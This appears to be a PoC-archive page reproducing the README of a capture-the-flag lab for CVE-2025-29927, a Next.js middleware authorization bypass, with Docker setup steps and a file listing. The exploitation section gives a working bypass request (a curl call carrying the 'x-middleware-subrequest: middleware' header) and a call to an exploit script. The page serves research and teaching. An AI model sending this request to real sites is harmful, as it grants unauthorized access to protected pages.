POC详情: 5fc47cddf1f9b5abd276fd539b4ebaed792eb653

来源
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
介绍
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.

---

## Vulnerability Summary

- **CVE**: CVE-2025-29927  
- **Type**: Authorization Bypass  
- **Component**: Next.js Middleware  
- **Impact**: Unauthorized access to protected routes  
- **PoC Target Route**: `/protected`  
- **Expected Behavior**: Unauthorized users are redirected to `/`  
- **Vulnerable Behavior**: Using a crafted request allows bypassing the redirect and accessing the protected content directly

---

## PoC Setup

### 1. Clone the Repository

```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```
---
### 2. Build and Run the Vulnerable App

```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```

This will start the vulnerable Next.js app on **http://IP:3000**

---

## Exploitation

### 1. Without Exploit

Try accessing:

```bash
curl -i http://IP:3000/protected
```

You will be redirected to `/`.

```bash
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```

### 2. With Exploit

Use the provided `exploit.py` to bypass the middleware and access the protected route:

```bash
python3 exploit.py -url http://IP:3000
```

If successful, you will retrieve the flag from `/protected`.

---

##  Files

- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file

---

## Disclaimer

This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.

---

## 🏁 Flag

Find the flag by exploiting the vulnerability and accessing:

```
http://IP:3000/protected
```

Good luck! 🏴‍☠️
文件快照
 [4.0K]  /data/pocs/5fc47cddf1f9b5abd276fd539b4ebaed792eb653
├── [1.9K]  exploit.py
├── [4.0K]  nextjs-docker
│   ├── [ 404]  Dockerfile
│   ├── [ 417]  middleware.js
│   ├── [ 271]  package.json
│   └── [4.0K]  pages
│       ├── [4.0K]  api
│       │   └── [ 478]  login.js
│       ├── [ 667]  index.js
│       ├── [1.8K]  login.js
│       └── [ 530]  protected.js
└── [2.1K]  README.md

3 directories, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。